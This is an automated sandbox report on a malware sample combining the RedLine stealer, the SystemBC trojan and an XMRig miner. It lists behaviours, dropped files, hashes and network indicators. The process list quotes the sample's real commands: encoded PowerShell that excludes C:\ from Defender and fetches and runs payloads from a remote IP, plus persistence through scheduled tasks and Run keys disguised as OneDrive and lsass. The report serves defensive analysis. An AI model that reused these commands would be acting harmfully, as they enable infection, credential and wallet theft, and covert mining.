Malware Analysis Report

2025-04-03 09:38

Sample ID: 230506-1bqlrsgb65
Target: 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d
SHA256: 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d
Tags: redline systembc xmrig infostealer miner persistence stealer trojan spyware
Score: 10/10

Analysis Overview

Score: 10/10

SHA256: 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d

Threat Level: Known bad

The file 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d was found to be: Known bad.

Malicious Activity Summary

Tags: redline systembc xmrig infostealer miner persistence stealer trojan spyware

SystemBC

Suspicious use of NtCreateUserProcessOtherParentProcess

xmrig

RedLine

Detects Redline Stealer samples

XMRig Miner payload

Downloads MZ/PE file

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Looks up external IP address via web service

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-05-06 21:28

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-05-06 21:28
Reported: 2023-05-06 22:46
Platform: win7-20230220-en
Max time kernel: 150s
Max time network: 145s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner

Downloads MZ/PE file

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" | C:\Users\Admin\AppData\Roaming\lsass.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target | Events
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1316 set thread context of 992 | N/A | C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe | C:\Windows\System32\conhost.exe
PID 1316 set thread context of 316 | N/A | C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe | C:\Windows\System32\conhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target | Events
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A | 2
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A | 1

Delays execution with timeout.exe

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\ProgramData\lsass\lsass.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Events
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 12
N/A | N/A | C:\Users\Admin\AppData\Roaming\OneDrive.exe | N/A | 6
N/A | N/A | C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe | N/A | 8

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target | Events
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 6
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A | 8
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\lsass.exe | N/A | 1
Token: SeDebugPrivilege | N/A | C:\ProgramData\lsass\lsass.exe | N/A | 1
Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A | 2

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\lsass.exe | N/A
N/A | N/A | C:\ProgramData\lsass\lsass.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Events
PID 1264 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 3
PID 1264 wrote to memory of 2040 | N/A | C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 3
PID 1264 wrote to memory of 1980 | N/A | C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 3
PID 1264 wrote to memory of 992 | N/A | C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 3
PID 1980 wrote to memory of 1364 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\OneDrive.exe | 3
PID 1984 wrote to memory of 1772 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe | 3
PID 1984 wrote to memory of 2044 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe | 3
PID 1984 wrote to memory of 1148 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe | 3
PID 1984 wrote to memory of 1732 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe | 3
PID 1964 wrote to memory of 868 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe | 3
PID 1980 wrote to memory of 1896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\dllhost.exe | 4
PID 1980 wrote to memory of 1704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\lsass.exe | 4
PID 908 wrote to memory of 1316 | N/A | C:\Windows\system32\taskeng.exe | C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe | 3
PID 1116 wrote to memory of 1848 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe | 3
PID 1116 wrote to memory of 1608 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe | 3
PID 1116 wrote to memory of 1668 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe | 3
PID 1116 wrote to memory of 1600 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\powercfg.exe | 3
PID 1960 wrote to memory of 992 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe | 3
PID 1704 wrote to memory of 892 | N/A | C:\Users\Admin\AppData\Roaming\lsass.exe | C:\Windows\SysWOW64\schtasks.exe | 4
PID 1704 wrote to memory of 804 | N/A | C:\Users\Admin\AppData\Roaming\lsass.exe | C:\ProgramData\lsass\lsass.exe | 4

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe

"C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Windows\system32\taskeng.exe

taskeng.exe {DC8F2C41-4C34-4BFD-BF40-8F990DC971DF} S-1-5-21-3499517378-2376672570-1134980332-1000:MLXLFKOI\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 00:50 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2AAA.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country | Destination | Domain | Proto | Events
RU | 62.204.41.23:80 | 62.204.41.23 | tcp | 3
US | 8.8.8.8:53 | maper.info | udp | 1
US | 8.8.8.8:53 | pool.hashvault.pro | udp | 1
US | 142.202.242.45:80 | pool.hashvault.pro | tcp | 1

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d5378b43b762d2361cd1daf8a27c5ea7
SHA1 f9bd89a702839605326816503b93ce588ae5a9a1
SHA256 ede84c9e060f753d9d469cee9bf04d78ce1c4bead30d6932f0c4b0842cc280da
SHA512 2077dac0085eebc1e3cd51c36ee2c6c9ff197d5e76080b9f435afa84364599ee3932ebcd7d22aef47649f5a2fea376f458a75b78981bbb1c7221e672a5ca4f4e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6ZZ022LQE1LN5RZOLBPU.temp

MD5 d5378b43b762d2361cd1daf8a27c5ea7
SHA1 f9bd89a702839605326816503b93ce588ae5a9a1
SHA256 ede84c9e060f753d9d469cee9bf04d78ce1c4bead30d6932f0c4b0842cc280da
SHA512 2077dac0085eebc1e3cd51c36ee2c6c9ff197d5e76080b9f435afa84364599ee3932ebcd7d22aef47649f5a2fea376f458a75b78981bbb1c7221e672a5ca4f4e

\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\c:\users\admin\appdata\roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\c:\programdata\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Temp\tmp2AAA.tmp.bat

MD5 d395d9d8ae883934bfeba74ff95953de
SHA1 d1cf03d8a0adf0384e4139d459c1f06a9a34df64
SHA256 ebb5d0ca4ed8c83da96b776ee45b9027d7648ed5b5a49dde3a35ba87e779a86c
SHA512 9774d53108ccec1f7c993fc536b5394b7a16c49bbd224a9ed3eba2f804a8871188dccf64d50e060e468cbbbbf3da9179cd14459bb390e022268fa2384b2e55d4

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-06 21:28

Reported

2023-05-06 22:47

Platform

win10v2004-20230220-en

Max time kernel

182s

Max time network

198s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
